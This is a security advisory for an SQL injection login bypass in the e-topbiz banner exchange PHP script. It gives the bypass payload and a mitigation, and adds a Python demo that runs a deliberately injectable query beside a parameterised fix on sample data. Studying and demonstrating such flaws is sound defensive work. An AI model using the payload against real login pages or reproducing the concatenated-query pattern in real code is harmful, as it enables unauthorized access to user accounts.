Vendor: Banner Exchange PHP
By: Hussin X
CVSS: 5.5 (MEDIUM)
Type: SQL Injection
CWE: 89
Product Name: Banner Exchange PHP
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested:
e-topbiz banner exchange php (Auth Bypass) SQL Injection Vulnerability
The e-topbiz banner exchange php script builds its login query from the submitted username and password without escaping or parameterisation, so the fields are injectable. An attacker can bypass authentication by entering the payload test11 ' or ' 1=1 (quotes included) in the username field together with any password: the single quote closes the string literal the script wraps around the field, and the appended or ' 1=1' is a condition that is always true, so the query returns a user row even though no valid credential was supplied and the attacker is logged in as that user.
Mitigation:
The script should pass user input to the database only through prepared statements with bound parameters (in PHP, PDO or mysqli prepared statements) instead of concatenating it into the query string; escaping or validating the input is a weaker second line of defence, not a substitute. No patched version is listed above, so until the vendor releases one, site operators should apply that fix to their own copy of the script or restrict access to the login page.
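To make the mechanism and the fix concrete, the following is an added example, not code from the advisory or from the e-topbiz script. It reproduces an injectable login of the form the advisory describes against an in-memory SQLite table using the advisory's payload, and places a parameterised version beside it. The table and column names (users, username, password), the sample accounts, and the assumption that the script checks username and password in a single WHERE clause are all hypothetical; the advisory does not show the script's actual query.

```python
import sqlite3

# Constructed sample accounts for this example (not data from the real script).
SAMPLE_USERS = [
    ("admin", "s3cret"),
    ("alice", "hunter2"),
]

# The payload quoted in the advisory, exactly as it would be typed into the form.
PAYLOAD = "test11 ' or ' 1=1"


def make_db():
    """In-memory database with an assumed users(username, password) table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)", SAMPLE_USERS
    )
    return conn


def build_vulnerable_query(username, password):
    """String concatenation: the pattern that makes the login injectable.
    Table and column names are assumed; the advisory does not show the script's query."""
    return (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )


def login_vulnerable(conn, username, password):
    """Runs the concatenated SQL; returns the matched username or None."""
    row = conn.execute(build_vulnerable_query(username, password)).fetchone()
    return row[0] if row else None


def login_fixed(conn, username, password):
    """Same lookup with bound parameters: input can never alter the query structure."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def demo():
    """Exercises both versions and returns the outcomes keyed by scenario."""
    conn = make_db()
    return {
        # Legitimate credentials work against both versions.
        "valid_vuln": login_vulnerable(conn, "alice", "hunter2"),
        "valid_fixed": login_fixed(conn, "alice", "hunter2"),
        # Payload in the username field only, arbitrary password. AND binds
        # tighter than OR, so against a query that checks both columns in one
        # WHERE clause this evaluates as
        #   username = 'test11 ' OR (' 1=1' AND password = 'wrong')
        # which is false for every row.
        "user_only_vuln": login_vulnerable(conn, PAYLOAD, "wrong"),
        # Payload in both fields: the query ends in OR ' 1=1', which SQLite and
        # MySQL both treat as true, so the first user row is returned without
        # any valid credential.
        "both_vuln": login_vulnerable(conn, PAYLOAD, PAYLOAD),
        # Parameterised query: the payload is just a username string that
        # matches nothing.
        "both_fixed": login_fixed(conn, PAYLOAD, PAYLOAD),
    }


if __name__ == "__main__":
    for scenario, outcome in demo().items():
        print(f"{scenario}: {outcome}")
```

One practitioner caveat the advisory glosses over: with a query of the single-WHERE-clause form assumed here, supplying the payload in the username field alone does not bypass the check because of AND/OR precedence; the bypass needs the payload in both fields, or a script whose query filters on the username only and compares the password afterwards. The advisory does not show the script's query, so both readings are possible. In PHP the equivalent of login_fixed is a prepared statement with bound parameters via PDO::prepare or mysqli_prepare.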